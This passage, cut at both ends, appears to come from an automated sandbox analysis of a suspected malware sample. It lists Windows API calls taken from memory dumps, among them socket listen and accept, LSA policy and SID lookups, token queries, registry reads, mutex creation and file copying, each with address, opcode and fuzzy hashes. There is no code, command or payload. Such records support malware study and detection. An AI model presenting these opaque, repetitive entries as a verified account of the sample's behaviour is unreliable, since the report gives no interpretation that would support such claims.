                                                                      • listen.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      • Opcode ID: 5c81bebe7a3dfbaa717489110247d3d288458aaf0f94e88b13a67dab2ad49018
                                                                      • Instruction ID: 9a30aab4b65601a223260482e509570c1e794402c1027634c9fab35b2f5dc158
                                                                      • Opcode Fuzzy Hash: 5c81bebe7a3dfbaa717489110247d3d288458aaf0f94e88b13a67dab2ad49018
                                                                      • Instruction Fuzzy Hash: 0F11E572504204AFEB11DF25DC84F6AFF98EF45324F1884ABEE44DB241D674A405CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.251090689.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e0633dee356d79868d76443dfde0b8cc7298aaeb4f64465c0a1cc419b59126a
                                                                      • Instruction ID: 58d596fc3b5b3fe29640b60bd153cb4ac06537f82df3cd3f440ad0c5bf2f3566
                                                                      • Opcode Fuzzy Hash: 0e0633dee356d79868d76443dfde0b8cc7298aaeb4f64465c0a1cc419b59126a
                                                                      • Instruction Fuzzy Hash: 85C2C974A00229CFDB64EF28C994BEDB7B2AF85305F1045E9D809AB394DB359E85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.251090689.0000000002950000.00000040.00000001.sdmp, Offset: 02950000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :@:r$`5ar
                                                                      • API String ID: 0-3512261011
                                                                      • Opcode ID: 113b55b6cf034c9f987e9a608cd08a6d269dbeb6acd23b4c3462a336f22869a0
                                                                      • Instruction ID: 1c0bf4776476f5d3b776060d28bcc0a69b8cafe45b3c3d8b709c4bae84dab56b
                                                                      • Opcode Fuzzy Hash: 113b55b6cf034c9f987e9a608cd08a6d269dbeb6acd23b4c3462a336f22869a0
                                                                      • Instruction Fuzzy Hash: E0D1FB3170060ACFC714FB38D890A9A7FAAFF84715F508929E55A9F358DFB16906CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0107B802
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 32e94ab0c1043e9ecb1daba477c9fa5621e42402f06ee2349b5d512399c6827c
                                                                      • Instruction ID: 69f2e076bb86d57978f000d43bb5eb3cb5f543d37e0e39883c1171310eb5c9e0
                                                                      • Opcode Fuzzy Hash: 32e94ab0c1043e9ecb1daba477c9fa5621e42402f06ee2349b5d512399c6827c
                                                                      • Instruction Fuzzy Hash: 9F41282540E7C0AFD3139B358C65A61BFB4AF47620B0E81DBD9C4DF5A3D2286909C7B6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LsaLookupSids.ADVAPI32(?,00000E2C), ref: 0107B4BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LookupSids
                                                                      • String ID:
                                                                      • API String ID: 2427636062-0
                                                                      • Opcode ID: aae256719d9cd15becb2538b51e643945da99043589db49e7cb9ebcf4a7df56a
                                                                      • Instruction ID: 1955dfd55ada0bf6108a4571130d52baf661195f451383b269e9eb8559162dc3
                                                                      • Opcode Fuzzy Hash: aae256719d9cd15becb2538b51e643945da99043589db49e7cb9ebcf4a7df56a
                                                                      • Instruction Fuzzy Hash: B1317072504344AFE722CB69CC44FAABFECEF45710F08899AE984DB152D724A908CB75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0107BCA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 1fe79600488b3a31fb30ba8f4f7bdb4b51cdc2b70c83893a9034883b101d2ef9
                                                                      • Instruction ID: 01246883450fc5287c6d790e1163638c3633353551bd6d5ebd7685c607a59959
                                                                      • Opcode Fuzzy Hash: 1fe79600488b3a31fb30ba8f4f7bdb4b51cdc2b70c83893a9034883b101d2ef9
                                                                      • Instruction Fuzzy Hash: A7317EB2505384AFE722CF25DD44F62BFE8EF46614F08849AE9848B252D375E909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04FD0DBF
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: a9b5b8aabb601cd2be7c8d4391b7ecb2bdcb4faad5cda1d788b8294d82c5b844
                                                                      • Instruction ID: bec8dd628d214cf8d253e51e168556485dec5bbc982b6fc78c1cece134a9ecfa
                                                                      • Opcode Fuzzy Hash: a9b5b8aabb601cd2be7c8d4391b7ecb2bdcb4faad5cda1d788b8294d82c5b844
                                                                      • Instruction Fuzzy Hash: A731A072504344AFEB228F65DC44F67BFACEF45720F0889AEF985DB152D224A819CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0107ABD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 09d20902e686ab6c7969663cad7617985505f9c95b0ae99bf641ffe25db0d8e2
                                                                      • Instruction ID: 7f6856d61d323de4bb00df0a2b41ae802ac7ceeb24e63d3ec66a06b0ac4dd4b8
                                                                      • Opcode Fuzzy Hash: 09d20902e686ab6c7969663cad7617985505f9c95b0ae99bf641ffe25db0d8e2
                                                                      • Instruction Fuzzy Hash: 7631B4B2504384AFE7228B25CC45F67BFECEF06710F08849BED809B152D264A849CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LsaLookupSids.ADVAPI32(?,00000E2C), ref: 0107B4BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LookupSids
                                                                      • String ID:
                                                                      • API String ID: 2427636062-0
                                                                      • Opcode ID: 972aa561b3383f843b931ee60807c9bdd69f7170059dcbfd285e5f60c560d14c
                                                                      • Instruction ID: 7b27c32a7b39a89429dc1d9446ffcacd2a996627b0c5aa4931f20c1bbc0b7b95
                                                                      • Opcode Fuzzy Hash: 972aa561b3383f843b931ee60807c9bdd69f7170059dcbfd285e5f60c560d14c
                                                                      • Instruction Fuzzy Hash: C5215EB2900208AEEB21DF69DC84FABBBECEF44710F14895AEA84DB141D674A5048B75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 351a7d8f767f13251e70045f389dc7967b6f3a9f95b5f87dfa46f4781793a007
                                                                      • Instruction ID: 52ed65e627c8072ae3140928f5ff9a7ba3132cc19b72f6af71190299c4dc2390
                                                                      • Opcode Fuzzy Hash: 351a7d8f767f13251e70045f389dc7967b6f3a9f95b5f87dfa46f4781793a007
                                                                      • Instruction Fuzzy Hash: 49316FB1509780AFE712CF25DC45F96FFA8EF06314F08849AE9849B253D375A909CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetProcessTimes.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: 8f8d51e7a96a430f3c38a97275c27fa0317903bf15b399cd16ee718919f764ec
                                                                      • Instruction ID: 902187e61cc8414ddd0af97618086727f205e4cdad279988211eb35c20df50d1
                                                                      • Opcode Fuzzy Hash: 8f8d51e7a96a430f3c38a97275c27fa0317903bf15b399cd16ee718919f764ec
                                                                      • Instruction Fuzzy Hash: BC31D5B2509380AFEB228F24DC45F96BFB8EF46314F0884DBE985DB193C225A905C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107ACD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107B06C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationToken
                                                                      • String ID:
                                                                      • API String ID: 4114910276-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0107B38F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: OpenPolicy
                                                                      • String ID:
                                                                      • API String ID: 2030686058-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateMutexW.KERNELBASE(?,?), ref: 04FD09F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 0107A1BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Startup
                                                                      • String ID:
                                                                      • API String ID: 724789610-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CopyFileW.KERNELBASE(?,?,?), ref: 04FD2F72
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CopyFile
                                                                      • String ID:
                                                                      • API String ID: 1304948518-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04FD1596
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04FD0DBF
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD13D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0091
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileType.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107BD95
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 04FD0575
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSASocketW.WS2_32(?,?,?,?,?), ref: 0107B8BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Socket
                                                                      • String ID:
                                                                      • API String ID: 38366605-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0107BCA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD02E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0107ABD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD110B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0107B38F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: OpenPolicy
                                                                      • String ID:
                                                                      • API String ID: 2030686058-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateMutexW.KERNELBASE(?,?), ref: 04FD09F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 7cfb81d8f6c2cf0c5531b0f04b4e77e05fbdc2d3fd1e5c247828a0de578bd8b9
                                                                      • Instruction ID: de7e9a65dab52551062174504d00015508802404db153455fd876ffca001b9e1
                                                                      • Opcode Fuzzy Hash: 7cfb81d8f6c2cf0c5531b0f04b4e77e05fbdc2d3fd1e5c247828a0de578bd8b9
                                                                      • Instruction Fuzzy Hash: 22218E71600204AFF720DF65CC85B6AFBE8EF04714F18846AEE489B242D775E805CB76
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD11E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 9de5f3426e08ca8ba5ef3b4e4250a7c0f53c0fb75affd1fe03ceeb2d2d09b238
                                                                      • Instruction ID: 163aae3b073cab49f0fda9821f9c297afdd2fe252a9d6e6ea38b91135fd76355
                                                                      • Opcode Fuzzy Hash: 9de5f3426e08ca8ba5ef3b4e4250a7c0f53c0fb75affd1fe03ceeb2d2d09b238
                                                                      • Instruction Fuzzy Hash: 41219372409384AFEB12CF65DC44F5AFFB8EF46310F0884ABEA849F152D275A509C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107B06C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationToken
                                                                      • String ID:
                                                                      • API String ID: 4114910276-0
                                                                      • Opcode ID: fcc2eaf251e687eec02c61d4be44992f5a5c5497c32e7c08b0c0ee3eee322176
                                                                      • Instruction ID: 4f7853524e85859da9dbd373a257ce05c6b75021ac81cd3387d9ea6f77940095
                                                                      • Opcode Fuzzy Hash: fcc2eaf251e687eec02c61d4be44992f5a5c5497c32e7c08b0c0ee3eee322176
                                                                      • Instruction Fuzzy Hash: 53119072500204AFEB228F65DC84FABBBACEF05320F14846BEE45DB251D674A5088BB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107ACD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 1851a548197bb75f2fea25063eb39a705625fb40de2682f86f9e10ce79fe85cd
                                                                      • Instruction ID: 85d6f6077ae0a898f182de3c5b5b32bf3c55d40fe4e1a04763b8e87fbfb1417c
                                                                      • Opcode Fuzzy Hash: 1851a548197bb75f2fea25063eb39a705625fb40de2682f86f9e10ce79fe85cd
                                                                      • Instruction Fuzzy Hash: AD218E71600608EFE720DF19CC81F6BBBECEF04710F0884AAEA859B251D660E808CA75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • setsockopt.WS2_32(?,?,?,?,?), ref: 0107B990
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: c8106c5ae39afc03f5d9b8dd82d1da93d69e4a35d1c7d746c43092ca5133757e
                                                                      • Instruction ID: 3521044bbf09eff662cf605cca0ac9b5c913579d911391b37ab84dad71cd272b
                                                                      • Opcode Fuzzy Hash: c8106c5ae39afc03f5d9b8dd82d1da93d69e4a35d1c7d746c43092ca5133757e
                                                                      • Instruction Fuzzy Hash: 68219A324093C0AFDB128F65DC44A96BFB4EF07320F1985DAD9C48F163C235A849DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 16176d5baa6a223d0de7d803c5cd9ce106dc056819eda6f4ce8a9e71fabed3ca
                                                                      • Instruction ID: 1906d90e74397d775593b7cde46ddfb7d52c6d3870a0e3c6c91d4ec47256b473
                                                                      • Opcode Fuzzy Hash: 16176d5baa6a223d0de7d803c5cd9ce106dc056819eda6f4ce8a9e71fabed3ca
                                                                      • Instruction Fuzzy Hash: 5C21C371500240AFE720DF25DD85FAAFBE8EF04310F18846AEE849B241D375B909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 04FD0575
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      • Opcode ID: cbef10c1c4a537c36bf4950277e56fb1ed39fd9f982e401dfd7c160599c1949e
                                                                      • Instruction ID: d9851201bd9d2f1ebfacc768786b90a51d94eba9b6d76d92ab43c9d0a4158aec
                                                                      • Opcode Fuzzy Hash: cbef10c1c4a537c36bf4950277e56fb1ed39fd9f982e401dfd7c160599c1949e
                                                                      • Instruction Fuzzy Hash: 8621AEB1900200AFE720DF25DC45B66FBE8EF05324F18846AED858B241D775F805CB75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSASocketW.WS2_32(?,?,?,?,?), ref: 0107B8BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Socket
                                                                      • String ID:
                                                                      • API String ID: 38366605-0
                                                                      • Opcode ID: 1b4921be4f06a5c786f2e8aa407f1c05b04c763aee62098e6c54305ed38d8d7f
                                                                      • Instruction ID: 7a8a98b3c32cd0d8f29b948a67d5c2db8c283855a415d5f76c6dee8830b6a673
                                                                      • Opcode Fuzzy Hash: 1b4921be4f06a5c786f2e8aa407f1c05b04c763aee62098e6c54305ed38d8d7f
                                                                      • Instruction Fuzzy Hash: 2321CD71900200AFEB21DF65DC44B6AFFE8EF08320F14846AEE858A252C3B1A408CB75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 026e818f493751cd3f14994105a81f5680a924ee0d206a43130ec22be7670a14
                                                                      • Instruction ID: abd63c70bec3ddf9910e1da29a0cb1a708f3e87c534c624a711c58112315e8d8
                                                                      • Opcode Fuzzy Hash: 026e818f493751cd3f14994105a81f5680a924ee0d206a43130ec22be7670a14
                                                                      • Instruction Fuzzy Hash: B621AE72500204AFE721DF15DC84F9AFFE8EF48324F14845AEA849B251D7B5B509CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04FD1C11
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      • Opcode ID: e3595497474b0fc2c413d7e8e147f4ea0eaec15b44f33a81376be0b212443679
                                                                      • Instruction ID: 6c8ac15fcd5b698e500a90283bd1a643b110e765b30bf5016d5691af02cc315d
                                                                      • Opcode Fuzzy Hash: e3595497474b0fc2c413d7e8e147f4ea0eaec15b44f33a81376be0b212443679
                                                                      • Instruction Fuzzy Hash: 222193B55093845FD7228F15DD44B62BFE8EF06314F0D808AED848B253D265A909C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD02E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: ff140174e89fcadb48e26707f0436470ab626bc0cccd8ccc0613dc68997a5c6f
                                                                      • Instruction ID: 9f6efe8de292b445a781a9aded1cd222c8090e0f3ae1a9cd345fdf0e7d9791bd
                                                                      • Opcode Fuzzy Hash: ff140174e89fcadb48e26707f0436470ab626bc0cccd8ccc0613dc68997a5c6f
                                                                      • Instruction Fuzzy Hash: 4111BE72600604AFEB20CF15CC81F67FBE8EF09710F08846AEA459B251DB64F409CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetProcessTimes.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: 2a7940bdae5174fd3784ea725fdf44cf820bdadf0c5bc37ef27a2cadc15268cd
                                                                      • Instruction ID: 66c8cbfa13db0824ce0f515816f3e7d854eff08ec4fb47659c3af9d551c6d30b
                                                                      • Opcode Fuzzy Hash: 2a7940bdae5174fd3784ea725fdf44cf820bdadf0c5bc37ef27a2cadc15268cd
                                                                      • Instruction Fuzzy Hash: BA11D072600200AFEB218F65DC44FAAFFA8EF44320F18846BEE459B251D674A4059B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD13D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      • Opcode ID: 01a0be7be1cca3e277cbe74bf1274033bfd94191dceb6c114f11378e75d2d0d4
                                                                      • Instruction ID: 9bd5158b7f7a5a43ad69be0ae9c1aeaa91cccd79542736073baf3762c254c359
